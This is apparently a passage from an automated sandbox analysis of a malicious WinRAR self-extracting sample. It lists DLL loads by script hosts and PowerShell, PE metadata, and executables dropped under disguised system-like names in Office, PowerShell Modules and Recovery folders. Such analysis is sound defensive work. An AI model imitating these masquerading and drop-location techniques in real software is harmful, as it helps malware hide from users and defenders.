                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Directory created: C:\Program Files\WindowsPowerShell\Modules\sihost.exe
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Directory created: C:\Program Files\WindowsPowerShell\Modules\66fc9ff0ee96c2
                        Source: OisrvsB6Ea.exe Static file information: File size 1899080 > 1048576
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: OisrvsB6Ea.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: OisrvsB6Ea.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: OisrvsB6Ea.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: OisrvsB6Ea.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: OisrvsB6Ea.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: OisrvsB6Ea.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe File created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\__tmp_rar_sfx_access_check_7029109
                        Source: OisrvsB6Ea.exe Static PE information: section name: .didat
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028F640 push ecx; ret 0_2_0028F653
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Code function: 0_2_0028EB78 push eax; ret 0_2_0028EB96
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BAA538F push ecx; ret 8_2_00007FFD9BAA5392
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BAA4B80 pushad ; retf 8_2_00007FFD9BAA4B83
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BAA4784 push ebx; iretd 8_2_00007FFD9BAA4790
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BAA3629 push E8FFFFFDh; iretd 8_2_00007FFD9BAA362E
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BE854D6 push ebx; iretd 8_2_00007FFD9BE855DA
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BE88F5A push eax; retf 8_2_00007FFD9BE88F59
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BE88EF2 push eax; retf 8_2_00007FFD9BE88F59
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe Code function: 8_2_00007FFD9BE85574 push ebx; iretd 8_2_00007FFD9BE855DA
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\ZDjBezmV.logJump to dropped file
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\DBQFDgRN.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\xIogbBMY.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\DjKnpLXK.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\FpiFczmJ.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\vBEPsorb.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\BkJolhdT.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\mUJprpRq.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\YBKLwVHY.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Program Files\WindowsPowerShell\Modules\sihost.exeJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\amqbDjSR.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\tSxpUEMf.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\pIbqPImn.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile created: C:\Users\user\Desktop\REWLTGNk.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\Desktop\PVPluWhn.logJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exe Process information set: NOOPENFILEERRORBOX
